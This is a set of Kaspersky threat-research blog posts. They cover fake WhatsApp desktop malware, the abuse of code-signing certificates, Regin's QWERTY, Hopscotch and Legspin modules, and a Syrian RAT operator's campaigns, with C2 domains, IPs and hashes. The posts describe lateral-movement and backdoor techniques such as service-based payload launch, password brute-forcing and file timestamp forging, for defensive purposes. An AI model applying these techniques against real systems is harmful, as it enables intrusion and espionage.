Secure List feed for B2B

Syndicate content
Online headquarters of Kaspersky Lab security experts.
Updated: 16 hours 16 min ago

WhatsApp for Web in the sight of cybercriminals

Mon, 02/02/2015 - 08:40

There is no doubt WhatsApp is among the most popular mobile IMs nowadays – its 700 million users worldwide were eagerly awaiting this week's promised desktop version. However, it wasn't just users who were waiting – cybercriminals were quick to start using this new feature in their attacks, aiming to spread malware and infect users.

In fact we've been seeing malicious messages about a supposed desktop WhatsApp long before the app added that platform to its repertoire. Fake downloads appeared in several languages and countries, and now there is a real product out there the fraudsters have returned to their old attacks, dressed them up in new clothes and sent them on the prowl for new victims. In Brazil, for example, we soon saw messages like this:

"WhatsApp for your PC" is now real, but this link is malware

We found several malicious domains registered to be used in these attacks. Some were already in use and others were waiting their owners' command, such as whatsappcdesktop.com.br, spreading Brazilian Trojan bankers (b93417abdc82cf79d79b737b61744353 and 9f485efea5c20b821e9522e3b4aa0e11):

However, other bad guys decided to prepare a nice design and ask users to install a suspicious Chrome extension that had nothing to do with WhatsApp:

You do not need a Chrome extension to use WhatsApp Web…

There are also some unofficial desktop versions of WhatsApp circulating among speakers of Arabic and Spanish. Here a website offer a version of "WhatsApp Plus" for installation:

And here the "WhatsApp Spy" targeting Spanish-speaking countries:

To download the supposed desktop version you need to inform your mobile number:

Why they ask your number? To subscribe on premium services that will cost money and to send you spam. Yes, spam. One thing is certain: all these web services aim to easily collect your mobile number and feed the long-established spam industry that already uses WhatsApp. As pointed out by Adaptive Mobile, the number of these spam messages increases day by day. WhatsApp process around 30 billion messages per day – not surprisingly, many of them are spam:

Mobile Spam, now on your instant message

It´s not difficult find Brazilian spammers who are already doing this, masquerading as 'marketing companies' and selling packages to disperse spam. Their services don't just include text, there's also the opportunity of spreading pics, audio or even video for the low price of $0.03 cents per message, including an admin and API panel:

U$75 for 5k credits, which correspond to 5,000 spam messages

Unfortunately, it is not possible block messages from unknown contacts on WhatsApp; all you can do is block the sender after the message was arrived, which does not solve the problem at all. In all cases keep in mind the real web services of WhatsApp are located at https://web.whatsapp.com so please refuse imitations and suspicious apps.

Why You Shouldn't Completely Trust Files Signed with Digital Certificates

Thu, 01/29/2015 - 06:00

A digital certificate with a file is always seen as a token of its security. For users, a digital certificate is an indication that the file does not contain malicious code. Many system administrators develop their corporate security policies by allowing users to launch only those files that are signed with a digital certificate. In addition, some antivirus scanners automatically consider a file to be secure if it is signed with a valid digital certificate.

However, users' absolute trust in files signed with digital certificates encourages cybercriminals to search for various ways to have their malicious files signed with the same trusted digital certificates to help use them in their criminal schemes.

This article looks into the main threats associated with signed files, and suggests practical methods of mitigating the risks associated with launching them.

Creating digital signatures for files

Before we explore the threats associated with using digital certificates, let us first look into the process when a file is signed with a digital certificate:

  1. The software developer compiles the file.
  2. A hash sum (MD5, SHA1, or SHA2) is calculated for the file.
  3. That hash sum is encrypted with the software developer's private key.
  4. The obtained encrypted block of data and the digital certificate are added to the end of the file.

The digital certificate contains the software developer's public key, which can be used to decrypt the message and check the file's integrity. It also contains information with which the software developers' authenticity can be checked.

The authenticity of the file's manufacturer is confirmed with the help of the Certification Authority (CA). This entity certifies to other users that the public key that decrypts the hash sum and checks the file's integrity does indeed belong to the developer in question. To do so, the CA signs the developer's certificate and thus testifies that the unique pair of public and private keys belongs to that particular developer. A certificate from the CA testifying that the file is authentic is also added to the end of the file alongside the developer's certificate.

CA certificates are verified by no one other than these entities. For Windows to trust the certificates issued by a certain CA, that CA's certificate must be placed into the operating system's storage of certificates. The certificates of the most authoritative CAs have undergone an audit and are automatically included into the storage and are delivered to users along with Windows updates. Certificates issued by other CAs can be added to the storage at the discretion of the user.

The use of trusted certificates by cybercriminals

Now let's look at attacks that can be carried out at each stage of signing a file. We are not interested in theoretical attacks based on the weaknesses of the encryption algorithms used to sign the file, but will concentrate instead on the attack methods most often used by cybercriminals in practice.

Planting malicious code at the file compilation stage

In many large software companies, files are signed automatically immediately after the file compilation is complete. File compilation is done centrally on a dedicated Build server.

If cybercriminals gain access to a software manufacturer's corporate network, they can use the corporate Build server to compile a malicious file on it, so it automatically gets signed with the company's digital signature. As a result of this attack, cybercriminals obtain a malicious file signed with a valid digital certificate.

In practice this type of attack is quite rare because large software manufacturers have adequate security in place to protect their Build servers. Nevertheless, there have been identified cases when targeted attacks were successfully conducted and malicious files were signed with a trusted company's certificate.

Stealing a private key

Sometimes, cybercriminals succeed in penetrating a corporate network and gaining access to a private key used to sign files. With that key, they can sign any malicious file and pass it off as a file produced by a legal software manufacturer.

One way to steal a private key is to use specialized malware created specifically for this purpose.

After stealing a private key, the cybercriminal either uses it or sells it to someone else to use. The more famous the software manufacturer from which the key was stolen, the more valuable the key will be among cybercriminals. Software from well-known manufacturers does not attract any suspicion from users and security administrators on corporate networks.

At the same time, large software manufacturer companies keep their private keys in dedicated, well-protected hardware modules, which makes it much more difficult to steal them.  As a result, private keys are typically stolen from smaller companies or private software manufacturers who do not pay enough attention to security.

Vulnerabilities in the algorithms that check executable file signatures

For an operating system to know which part of the file is supposed to contain the information about the presence of a digital certificate, the header of each signed executable file includes 8 bytes of data that contain information about the location and the size of the digital certificate. These 8 bytes are ignored when checking the file's signature. If a block of data is added to the end of the file's signature, and the size of the signature is increased by an appropriate amount, these changes also will also have no effect on the outcome of the signature check. This makes it possible to gain extra space in a signed file where data can be added without affecting the outcome of a signature check.

This algorithm is used actively in legal web installers: software developers who create these web installers modify the size of the digital signature to make room for an additional block of data, so that the digital certificate block includes a link to a file for that installer to download from the software developer's page and install on the users' system. This is a practical approach for software developers because the installer does not have to be re-signed each time the link to the software distribution kit is changed: it is enough to simply change the link stored in the digital signature block.

Cybercriminals, in turn, can use this algorithm for their own purposes. A cybercriminal takes a web installer for legal software, and changes the link so a different distribution kit to be downloaded. The installer then downloads and installs malware on the user's system. After that, the cybercriminal uploads the modified installer to software distribution sites.

To fix this vulnerability, Microsoft released a security update that enforces a rigorous check of each file's digital certificates. However, this update does not apply automatically because many software developers use the above algorithm in their installers, and their software programs would be considered unsigned if this update was applied across the board. The user can enable this update manually, if required.

The use of legally obtained certificates

A few years ago, digital certificates were actively used by large software manufacturers that were legally registered companies. Today, certificates are used increasingly often by individual software developers and small companies. The graph below shows how the number of certificates with which to sign software code known to Kaspersky Lab changed over time. As can be seen, the number of certificates is steadily growing year on year.

The number of certificates verified by CAs and known to Kaspersky Lab

The procedure of purchasing a certificate to sign executable code is quite simple: individuals must present their passport details, and companies must present their registration details. Some certificate-issuing CAs make no further checks into the activities of the companies seeking to purchase the certificate. All a CA does is it issues a certificate entitling the client to sign executable files, and verifies that the certificate has indeed been issued to the specific person or company.

This enables cybercriminals to legally purchase a certificate to sign their malicious and/or potentially unwanted software.

It is companies manufacturing potentially unwanted software that most often purchase certificates. On the one hand these companies do not manufacture malware programs, so they can legally purchase a digital certificate to sign their software. On the other hand, they produce software annoys users. In fact, they get their software signed with digital certificates precisely to encourage users to trust them.

Untrusted certificates

In all cases described above, be it stealing a private key, compromising a company's infrastructure and signing a file with that company's digital certificate, or purchasing a certificate with the intent of signing malware with it, the end result is the same: a trusted certificate is used to sign a malicious file.

Therefore, these certificates cannot be considered trusted in spite of the fact that their authenticity has been verified by a CA, as they were (or continue to be) used to sign malicious files. We will hereafter describe these certificates as 'untrusted'.

If a private key is stolen from a software developer, or a company's infrastructure is compromised and a trusted certificate is used to sign a malicious file, the CAs cease verifying the trustworthiness of the certificate that was earlier issued by them (a process also known as recalling the certificate). The speed of the CA's reaction depends on how soon it becomes known that the certificate has been used by somebody other than the legitimate developer.

However, when a certificate was purchased to sign potentially unwanted software, the CAs do not always recall the certificate. As a result the certificate could remain valid and be used to sign potentially dangerous software.

The following chart shows the proportions of untrusted certificates used to sign malware and potentially unwanted software (Kaspersky Lab data).

Breakdown of untrusted certificate numbers by their type

Methods of protection against launching software programs signed with untrusted certificates

We have discussed the most popular cybercriminals techniques to get files signed with digital certificates. Recently we have seen an increasingly significant problem concerning malicious and potentially unwanted files being signed with digital certificates. In 2008, 1,500 certificates were later used to sign malware; in 2014, there were more than 6,000 of these cases.

The number of untrusted certificates known to Kaspersky Lab

Given the growing number of threats associated with malicious files signed with digital certificates, users and administrator can no longer risk placing blind faith in signed files and just allow them to be launched simply because they have a digital certificate.

Here are a few practical tips to reduce your chances of launching a new malware program that has a valid digital certificate and hasn't yet reached your anti-virus databases:

  1. Only allow the launch of software programs signed by a reputable manufacturer.
  2. You can substantially reduce the risk of infection on your computer by disabling the launch of all software programs signed with digital certificates belonging to unknown software manufacturers. As described above, certificates are most often stolen from smaller software companies.

  3. Only allow programs to be launched after they are identified by their unique digital signature attributes.
  4. Several certificates issued to the same company may be distributed under the same name. If one of these certificates is stolen from a reputable company, a check that automatically trusts well-known publishers would allow a file signed with a stolen certificate.

    To prevent this from happening, before allowing programs signed with known certificates to launch, it is necessary to check other attributes as well as the certificate name. These attributes might be the serial number or certificate fingertip (hash sum). Serial numbers are only unique within the range of certificates issued by a single CA, so we recommend checking this along with the company that issued the certificate in the first place.

  5. Activate the MS13-098 security update.
  6. For experienced users and system administrators, it is advisable to enable update MS13-098 – it fixes an error which enables the inclusion of additional data in a signed file without tampering with the file's signature. To read more about how to activate this update, follow this link to Microsoft Security Center.

  7. Do not install certificates from unknown CAs into your security storage.
  8. It is not a good idea to install root certificates from unknown CAs into your storage. If you do so, any files signed with a certificate confirmed by that specific CA will subsequently be considered trusted.

  9. Use a trusted certificates database from a security software manufacturer.
  10. Some security software manufacturers, including Kaspersky Lab, include a database of trusted and untrusted certificates in their products; this database is updated on a regular basis along with the anti-virus databases. With this database, you will receive prompt updates about as-yet unrecalled certificates used to sign malware and/or potentially unwanted software. Files signed with untrusted certificates from this database require enhanced monitoring by the security product.

    The database of trusted certificates includes certificates from reputable software publishers that were used to sign trusted software programs. If a certificate is listed in this database, it is a strong indicator that corporate application control can allow the application to launch.

    If this kind of database is included in a security product it will help make the administrator's job easier, sparing them the need to create and maintain an in-house database of trusted certificates.

The number of digital certificates used to sign malware and/or potentially unwanted software is doubling every year on average. That is why it is vital that companies exercise ever greater control over signed files with the help of security product tools, and follow the above security policies.

Comparing the Regin module 50251 and the "Qwerty" keylogger

Tue, 01/27/2015 - 07:00

On January 17 2015, Spiegel.de published an extensive article based on documents obtained from Edward Snowden. At the same time, they provided a copy of a malicious program codenamed "QWERTY" (http://www.spiegel.de/media/media-35668.pdf), supposedly used by several governments in their CNE operations.

We've obtained a copy of the malicious files published by Der Spiegel and when we analyzed them, they immediately reminded us of Regin. Looking at the code closely, we conclude that the "QWERTY" malware is identical in functionality to the Regin 50251 plugin.

Analysis

The Qwerty module pack consists of three binaries and accompanying configuration files. One file from the package– 20123.sys – is particularly interesting.

The "20123.sys" is a kernel mode part of the keylogger. As it turns out, it was built from source code that can also be found one Regin module, the "50251" plugin.

Using a binary diff it is easy to spot a significant part of code that is shared between both files:

Most of the shared code belongs to the function that accesses the system keyboard driver:

Most of the "Qwerty" components call plugins from the same pack (with plugin numbers 20121 – 20123), however  there is also one piece code that references plugins from the Regin platform. One particular part of code is used in both the "Qwerty" 20123 module and the Regin's 50251 counterpart, and it addresses the plugin 50225 that can be found in the virtual filesystems of Regin. The Regin's plugin 50225 is reponsible for kernel-mode hooking.

This is a solid proof that the Qwerty plugin can only operate as part of the Regin platform, leveraging the kernel hooking functions from plugin 50225.

As an additional proof that both modules use the same software platform, we can take a look at functions exported by ordinal 1 of both modules. They contain the startup code that can be found in any other plugin of Regin, and include the actual plugin number that is registered within the platform to allow further addressing of the module. This only makes sense if the modules are used with the Regin platform orchestrator.

The reason why the two modules have different plugin IDs is unknown. This is perhaps because they are leveraged by different actors, each one with its own allocated plugin ID ranges.

Conclusions

Our analysis of the QWERTY malware published by Der Spiegel indicates it is a plugin designed to work part of the Regin platform.  The QWERTY keylogger doesn't function as a stand-alone module, it relies on kernel hooking functions which are provided by the Regin module 50225.  Considering the extreme complexity of the Regin platform and little chance that it can be duplicated by somebody without having access to its sourcecodes, we conclude the QWERTY malware developers and the Regin developers are the same or working together.

Another important observation is that Regin plugins are stored inside an encrypted and compressed VFS, meaning they don't exist directly on the victim's machine in "native" format. The platform dispatcher loads and executes there plugins at startup. The only way to catch the keylogger is by scanning the system memory or decoding the VFSes.

 

Appendix (MD5 hashes):

QWERTY 20123.sys:

0ed11a73694999bc45d18b4189f41ac2


Regin 50251 plugins:

c0de81512a08bdf2ec18cb93b43bdc2d  e9a43ea2882ac63b7bc036d954c79aa1

The Syrian malware part 2: Who is The Joe?

Tue, 01/27/2015 - 04:00
Introduction

Kaspersky Lab would like to alert users in the Middle East for new malware attacks being delivered through Syrian news and social networking forums. Malware writers are using multiple techniques to deliver their files and entice the victims to run them, creating an effective infection vector. Mainly depending on social engineering, the attackers exploit Victims' trust in social networking forums, curiosity in following news related to the conflict in Syria, their standing in Syria, in addition to their lack of Cyber Security awareness. Once criminals infect the victim's computer, attackers have full access and control over victim's devices.

In the first report on Syrian malware, Kaspersky Lab detailed many attacks being used in Syria to spy on users, the report included attacks from different teams and many sources.

This post will follow up on one of the domains, seemingly the most active in the last period: thejoe.publicvm.com

The malware files were found on activist sites and social networking forums, some others were reported by regional organisations like CyberArabs.

Reports that mention "the Joe"
https://citizenlab.org/2013/06/a-call-to-harm/
https://www.eff.org/files/2013/12/28/quantum_of_surveillance4d.pdf

All the files hide under the hood a full-featured variant of a RAT, Remote Administration Trojan (Bitfrose/NjRAT/Shadowtech/Darkcomet...), capable of getting full control over victim machines and devices, monitoring any movements and accessing all files. The thejoe.publicvm.com domain is related to many samples, here we will focus on the most important and luring, that most probably collected the highest number of targeted victims, estimated in thousands.

There are many factors and entities at play in this event, we will only focus on the malware and the facts that have been found during the analysis, presenting only relevant information, in the hope of setting a clear context for this research.

What is the information we had on theJoe?
What has the Joe been doing in the last period?
Who is the Joe?

What is the information we had on the Joe?

The Joe is one of the most active cyber criminals in Syria and the Middle East, targeting all types of users, following is the information collected on the Joe and his activities.

Domain information "thejoe.publicvm.com"

The Joe is using a dynamic domain to be able to change his IP address and maintain anonymity:
The domain thejoe.publicvm.com has been seen using the following IP addresses located in Syria and Russia:

  • 31.9.48.146
  • 31.9.48.119
  • 31.9.48.146
  • 31.9.48.80
  • 31.9.48.78
  • 31.9.48.119
  • 31.8.48.7

TCP ports used in the attacks: 1234, 1177, 5522.

Malware information

From the malware samples collected, we were able to find strings in the code, from the Windows device used by the Joe.

Folder paths recovered from the malware files:

  • C:\Users\joe\Desktop\2014\WindowsApplication1\WindowsApplication1\obj\Debug\WindowsApplication1.pdb
  • C:\Users\joe\Desktop\Desktop\Syriatel\Syriatel\obj\Debug\Syriatel.pdb
  • C:\Users\joe\Desktop\NJServer\NJServer\obj\Debug\NJServer.pdb
Youtube Channel

The Joe is also using a fake youtube channel where he posts social engineering videos with links to download malware.

http://www.youtube.com/channel/UCCdoQBw-a6dM15ZyhrsqW_w

The Channel is distributing malware files under the name "Lions of the revolution" or other...

What has the Joe been doing in the last period?

The Joe was busy in the last period; In the below we display some of the most graphical and luring samples collected by the Kaspersky Intelligence services and the Kaspersky Security Network (KSN cloud), detailing their functionalities and how The Joe is able to use the situation in Syria to have the users automatically open the files even if they suspect infected. The most targeted countries are Syria, Turkey, Lebanon and Saudi Arabia. The number of victims is estimated around 2000.

6 new stories:

  1. Let us fix your SSL vulnerability
  2. Now Let us clean your Skype!
  3. Did you update to the latest VPN version?
  4. Let's Check if your phone number is among the monitored numbers
  5. The Facebook account encryption application
  6. What's your favourite security product?

1 - Let us fix your SSL vulnerability

MD5 Hash: dc6166005db7487c9a8b32d938fec846
Filename: TheSSL.exe, SSL Cleaner.rar

Following up on the vulnerabilities in the OPENSSL, and the amount of news it reached, the cyber criminals are trying to benefit of the user perception of such news but lack of awareness on how the vulnerabilities could be fixed.

Demonstration video on the Heartbleed vulnerability + Link to download the "Fix" with infection



2 - Now Let us clean your Skype!

MD5 Hash: d6ab8ca6406fefe29e91c0604c812ff9
File Name: Skype.exe

Another social engineering trick used to lure criminals to download and execute a malicious file, the skype cleaner to "protect and encrypt your skype communications".


3 - Did you update to the latest VPN version?

MD5 Hash: 2e07e8622b4e997f6543fc0497452dad
File Name: VPN.exe

Psiphon, a legitimate application used around the world for anonymity protection, is particularly effective and used in Syria for users to protect their traffic from snooping or interception, the application here is bound with malware and delivered to the users as an updated version.


4 - Let's Check if your phone number is among the monitored numbers

MD5 Hash: ad9a18e1db0b43cb38da786eb3bf7c00
File Name: Syriatel.exe

Another one of the popular malware files, is used to fake a tool that is used to check the mobile phone numbers under surveillance and sorted by location, delivered as a "leaked program" to the victims.



5 - The Facebook account encryption application

MD5 Hash: efdaa73e0ac1b045d5f2214cadd77f09
File Name: Rooms.exe


6 - What's your favourite security product?

One of the latest files used to infect users is quite different: a binding of a Kaspersky Lab tool with malware. Developed by Kaspersky Lab, TDSSKiller is a powerful free tool that can detect and remove a specific list of rootkit malware families.

Bound with malware, the Joe is using the Kaspersky name to deliver the malware in an attempt to lure victims to open and trust the files he is sending.

 Who is "The Joe"

Hundreds of samples were analyzed relating to the Syrian malware, one of the samples, extracts to multiple documents, in one of which, we were able to find a metadata slip which extracted to some interesting information.

The metadata slip by the guy using "Joe" as his nickname, revealed his personal email, which using further research leads to his other emails, full identity, social pages...

On Facebook:

On Linkedin:

Indicators of compromise MD5 Hash Name(s) used for the malware file First Seen f62cfd2484ff8c5b1a4751366e914613 Adobe.exe
Reader.exe
Card.exe Sept 2013 012f25d09fd53aeeddc11c23902770a7
89e6ae33b170ee712b47449bbbd84784 قائمة الأرهاب .zip ("list of terrorism") file extracts to .JPG and malicious .SCR files Jan 2014 dc6166005db7487c9a8b32d938fec846
62023eb959a79bbdecd5aa167b51541f TheSSL.exe (to "remove SSL weaknesses")
SSL Cleaner.rar April 2014 cc694b1f8f0cd901f65856e419233044 Desktop.exe
Empty.exe
Host.exe Mar 2014 d6ab8ca6406fefe29e91c0604c812ff9 Skype.exe
Skypecleaner.exe July 2014 2e07e8622b4e997f6543fc0497452dad VPN.exe Sept 2014 efdaa73e0ac1b045d5f2214cadd77f09 Rooms.exe (to "encrypt your Facebook") Nov 2014 39d0d7e6880652e58b2d4d6e50ca084c Photo.exe Nov 2014 abf3cfecd2e194961fc97dac34f57b24 Ram.exe
Setup.exe Nov 2014 a238f8ab946516b6153816c5fb4307be tdskiler.exe (to "remove malware") Jan 2015 6379afd35285e16df4cb81803fde382c Locker.exe (to "encrypt/decrypt" files) Jan 2015

Kaspersky Lab detects all malicious files used in the attacks.
All files are actively being used by the cybercriminals at the time of this report.

Conclusion

Syrian malware has a strong reliance on social engineering and the active development of malicious variants. Nevertheless, most of them quickly reveal their true nature when inspected carefully; and this is one of the main reasons for urging Syrian users to be extra vigilant about what they download and to implement a layered defense approach. We expect these attacks to evolve both in quality and quantity.

For more details, please contact: intelligence@kaspersky.com

An analysis of Regin's Hopscotch and Legspin

Thu, 01/22/2015 - 05:00

With high profile threats like Regin, mistakes are incredibly rare. However, when it comes to humans writing code, some mistakes are inevitable. Among the most interesting things we observed in the Regin malware operation were the forgotten codenames for some of its modules.

These are:

  • Hopscotch
  • Legspin
  • Willischeck
  • U_STARBUCKS

We decided to analyze two of these modules in more detail - Hopscotch and Legspin.

Despite the overall sophistication (and sometimes even over-engineering) of the Regin platform, these tools are simple, straightforward and provide interactive console interfaces for Regin operators. What makes them interesting is the fact they were developed many years ago and could even have been created before the Regin platform itself.

The Hopscotch module MD5 6c34031d7a5fc2b091b623981a8ae61c Size 36864 bytes Type Win32 EXE Compiled 2006.03.22 19:09:29 (GMT)

This module has another binary inside, stored as resource 103:

MD5 42eaf2ab25c9ead201f25ecbdc96fb60 Size 18432 bytes Type Win32 EXE Compiled 2006.03.22 19:09:29 (GMT)

This executable module was designed as a standalone interactive tool for lateral movement. It does not contain any exploits but instead relies on previously acquired credentials to authenticate itself at the remote machine using standard APIs.

The module receives the name of the target machine and an optional remote file name from the standard input (operator). The attackers can choose from several options at the time of execution and the tool provides human-readable responses and suggestions for possible input.

Here's an example of "Hopscotch" running inside a virtual machine:

Authentication Mechanism (SU or NETUSE) [S]/N: Continue? [n]: A File of the same name was already present on Remote Machine - Not deleting...

The module can use two routines to authenticate itself at the target machine: either connecting to the standard share named "IPC$" (method called "NET USE") or logging on as a local user ("SU", or "switch user") who has enough rights to proceed with further actions.

It then extracts a payload executable from its resources and writes it to a location on the target machine. The default location for the payload is: \\%target%\ADMIN$\SYSTEM32\SVCSTAT.EXE. Once successful, it connects to the remote machine's service manager and creates a new service called "Service Control Manager" to launch the payload. The service is immediately started and then stopped and deleted after one second of execution.

The module establishes a two-way encrypted communication channel with the remote payload SVCSTAT.EXE using two named pipes. One pipe is used to forward input from the operator to the payload and the other writes data from the payload to the standard output. Data is encrypted using the RC4 algorithm and the initial key exchange is protected using asymmetric encryption.

\\%target%\pipe\{66fbe87a-4372-1f51-101d-1aaf0043127a}
\\%target%\pipe\{44fdg23a-1522-6f9e-d05d-1aaf0176138a}

Once completed, the tool deletes the remote file and closes the authenticated sessions, effectively removing all the traces of the operation.

The SVCSTAT.EXE payload module launches its copy in the process dllhost.exe and then prepares the corresponding named pipes on the target machine and waits for incoming data. Once the original module connects to the pipe, it sets up the encryption of the pipe communication and waits for the incoming shellcode.

The executable is injected in a new process of dllhost.exe or svchost.exe and executed, with its input and output handles redirected to the remote plugin that initiated the attack. This allows the operator to control the injected module and interact with it.

The Legspin module MD5 29105f46e4d33f66fee346cfd099d1cc Size 67584 bytes Type Win32 EXE Compiled 2003.03.17 08:33:50 (GMT)

This module was also developed as a standalone command line utility for computer administration. When run remotely it becomes a powerful backdoor. It is worth noting that the program has full console support and features colored output when run locally. It can even distinguish between consoles that support Windows Console API and TTY-compatible terminals that accept escape codes for coloring.

"Legspin" output in a standard console window with color highlighting

In addition to the compilation timestamp found in the PE headers, there are two references that point to 2003 as its true year of compilation. The program prints out two version labels:

  • 2002-09-A, referenced as "lib version"
  • 2003-03-A

In addition the program uses legacy API functions, like "NetBIOS" that was introduced in Windows 2000 and deprecated in Windows Vista.

Once started and initialized, it provides the operator with an interactive command prompt, waiting for incoming commands. The list of available commands is pretty large and allows the operators to perform many administrative actions. Some of the commands require additional information that is requested from the operator, and the commands provide a text description of the available parameters. The program is actually an administrative shell that is intended to be operated manually by the attacker/user.

Command Description cd Change current working directory dir
ls
dirl
dirs List files and directories tar Find files matching a given mask and time range, and write their contents to a XOR-encrypted archive tree Print out a directory tree using pseudographics
trash Read and print out the contents of the Windows "Recycle Bin" directory get Retrieve an arbitrary file from the target machine, LZO compressed put Upload an arbitrary file to the target machine, LZO compressed del Delete a file ren
mv
copy
cp Copy or move a file to a new location gtm Get file creation, access, write timestamps and remember the values stm Set file creation, access, write timestamps to the previously retrieved values mtm Modify the previously retrieved file timestamps scan
strings Find and print out all readable strings from a given file more Print out the contents of an arbitrary file access Retrieve and print out DACL entries of files or directories audit Retrieve and print out SACL entries of files or directories finfo Retrieve and print out version information from a given file cs Dump the first 10,000 bytes from an arbitrary file or from several system files:

advapi32.dll
kernel32.dll
msvcrt.dll
ntdll.dll
ntoskrnl.exe
win32k.sys
cmd.exe
ping.exe
ipconfig.exe
tracert.exe
netstat.exe
net.exe
user32.dll
gdi32.dll
shell32.dll

lnk Search for LNK files, parse and print their contents info Print out general system information:
  • CPU type
  • memory status
  • computer name
  • Windows and Internet Explorer version numbers
  • Windows installation path
  • Codepage
dl Print information about the disks:
  • Type
  • Free/used space
  • List of partitions, their filesystem types
ps List all running processes logdump Unfinished, only displays the parameter description reglist Dump registry information for a local or remote hive windows Enumerate all available desktops and all open windows view List all visible servers in a domain domains List the domain controllers in the network shares List all visible network shares regs Print additional system information from the registry:
  • IE version
  • Outlook Express version
  • Logon default user name
  • System installation date
  • BIOS date
  • CPU frequency
  • System root directory
ips List network adapter information:
  • DHCP/static IP address
  • Default gateway's address
times Obtain the current time from a local or remote machine who List the names of current users and the domains accessed by the machine net
nbtstat
tracert
ipconfig
netstat
ping Run the corresponding system utility and print the results tel Connect to a given TCP port of a host, send a string provided by the operator, print out the response dns
arps Resolve a host using DNS or ARP requests users List information about all user accounts admins List information about user accounts with administrative privileges groups List information about user groups trusts List information about interdomain trust user accounts packages Print the names of installed software packages sharepw Run a brute-force login attack trying to obtain the password of a remote share sharelist Connect to a remote share srvinfo Retrieve current configuration information for the specified server netuse Connect, disconnect or list network shares netshare Create or remove network shares on the current machine nbstat List NetBIOS LAN adapter information run Create a process and redirect its output to the operator system Run an arbitrary command using WinExec API exit Exit the program set Set various internal variables used in other shell commands su Log on as a different user kill Terminate a process by its PID kpinst Modify the registry value:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] System
This value should normally point to "lsass.exe". svc
drv Create, modify or remove a system service help
? Print the list of supported commands

The Legspin module we recovered doesn't have a built-in C&C mechanism. Instead, it relies on the Regin platform to redirect the console input/output to/from the operators.

Conclusions

Unlike most other Regin modules, Legspin and Hopscotch appear to be stand-alone tools developed much earlier. The Legspin backdoor in particular dates back to 2003 and perhaps even 2002. It's worth pointing that not all Regin deployments contain the Legspin module; in most cases, the attackers manage their victims through other Regin platform functions.

This means that Legspin could have been used independently from the Regin platform, as a simple backdoor together with an input/output wrapper.

Although more details about Regin are becoming available, there is still a lot that remains unknown. One thing is already clear – what we know about Regin is probably already retired information that has been replaced by new modules and techniques as time passes.

Windows 10 Preview and Security

Wed, 01/21/2015 - 15:25

Microsoft presented a preview of their newest "experience", Windows 10, over a live stream this morning. The release is expected later this year. This isn't envisioned as just an OS for desktops, but it brings support as a truly broad computing platform. They claim to have built Windows 10 with "more personal computing" in mind, and it's an ambitious push into seamlessly bringing together desktop computing, holographic computing (awesome!!!), mobile devices, gaming and IoT, a move to the "Store", productivity applications, big data services and sharing, new hardware partner technologies, and cloud computing for a "mobility of experience". They skimmed over "Trust" only in light of data privacy issues. From what I have seen, pushing aside security is a somewhat disappointing theme for all of the vendors at their previews, not just Microsoft. There is, however, a very long list of enhanced security features developed into this new codebase along with a massive amount of new attack surface introduced with this new platform.

Microsoft is attempting to better tighten down the new version of Windows the operating system by disallowing untrusted applications from installing and verifying their trustworthiness with their digital signature. This trusted signing model is an improvement, however, this active handling is not perfect. APT like Winnti's attacks on major development shops and their multiple, other significant ongoing attack projects demonstrate that digital certificates are readily stolen and re-used in attacks. Not just their core group's winnti attacks, but the certificates are distributed throughout multiple APT actors, sharing these highly valued assets, breaking the trust model itself to further their espionage efforts.

With seamless integration of all these data sharing services across computing resources, authentication and their underlying credentials and tokens cannot be leaked across services, applications, and devices. Pass-the-hash attack techniques frequently used by targeted attackers haunted corporate organizations using Windows for almost a decade. These types of credential theft techniques will have to be better protected against. And Flame introduced a whole new level of credential attack, so we may see Hyper-V and the newest container model for Windows 10 attacked to gain access to and abuse these tokens for lateral movement and data access. Defensive efforts haven't been terribly successful in their responsiveness in the past, and Active Directory continues to see new attacks on organization-wide authentication with "skeleton keys". So, their implementation of credential provisioning and access token handling will deserve security researchers' attention - Hyper-V technologies and components' attack surface will come under a new focus for years to come. And the DLP implementation for sharing corporate data securely is encouraging as well, but how strong can it be across energy constrained mobile hardware?

Considering that 2014 brought with it over 200 patch-worthy vulnerabilities for the various versions of Internet Explorer, a minimalist refresh of this code with the "Project Spartan" browser would be welcome. Simply put, the IE web browser was hammered in 2014 across all Windows platforms, including their latest. Our AEP and other technologies have been protecting against exploitation of these vulnerabilities in high volume this past year. Not only has its model implementing ActiveX components and its design been under heavy review, but the slew of newer code and functionality enabling "use-after-free" vulnerabilities led to critical remote code execution. The new Spartan browser brings with it large amounts of new code for communications and data sharing, which brings with it Microsoft's track record of introducing hundreds of patch-worthy vulnerabilities annually into their browser code. Hopefully their team won't bring that baggage with them, but the load seems pretty heavy with the new functionality. I didn't see any new security features, development practices, or sandboxes described for it and will wait to see what is in store here.

An unusually large amount of time was set aside to present their "intelligent assistant" Cortana, which started with a somewhat disconnected and bizarre conversation between the presenter and the actual Cortana assistant instance onstage. The devil is in the details when implementing security support for access to data across fairly unpredictable services like this one.

Of course, our products will be ready to go. Kaspersky Lab consumer products will support Windows 10 after its official launch. There will be no need for customers to reinstall Kaspersky Lab solutions for migration onto the new platform. All these products will be patched accordingly and will provide the same exceptional level of protection on the new Windows OS.

Microsoft Security Updates January 2015

Wed, 01/14/2015 - 20:34

Microsoft's security team begins 2015 with a minimal set of Security Bulletins, MS15-001 through MS15-008. The set included one critical vulnerability in a service that probably shouldn't be shipped any longer (telnet), and seven bulletins rated "Important" patches for elevation of privilege, DoS, and security bypass issues.

The critical Bulletin effects the telnet service. The telnet service is an ancient piece of software that provides shell access to a system, mostly available on router installations. Only it's over unencrypted, plain text communications, and should not be used. It was also a bit of a bear to configure and make useful, but may have been useful in development and IT environments. Luckily, this service is not enabled by default on supported windows systems (but it is installed by default on Windows Server 2003). A quick search in shodan shows a pretty reduced set of users, and its presence in our Ksn data is very limited. And, on the public internet, the number of Windows telnet servers listening on port 23 and providing a related banner is only a couple hundred. So, this patch effects very few customers.

But, if someone didn't install an alternative like OpenSSH, uses the PowerShell facility, WinSCP, RDP, or other facilities, and oddly installed this service, they may be running a server vulnerable to remote malformed packet delivery leading to remote code execution. Meaning it's a severe issue that really "shouldn't" effect many users. And it appears to not be exploited on our user base. When installed and enabled, Microsoft's telnet server runs as "Tlntsess.exe" on all Windows systems since Windows Server 2003. And on a somewhat related note, Ksn shows infected Tlntsess.exe files on new customer systems running a first scan or enabling a scan after running infected code:
Virus.Win32.Virut.ce
Worm.Win32.Mabezat.b
Virus.Win32.Sality.gen
Virus.Win32.Parite.b
Virus.Win32.Nimnul.a
Virus.Win32.Tenga.a
Virus.Win32.Expiro.w
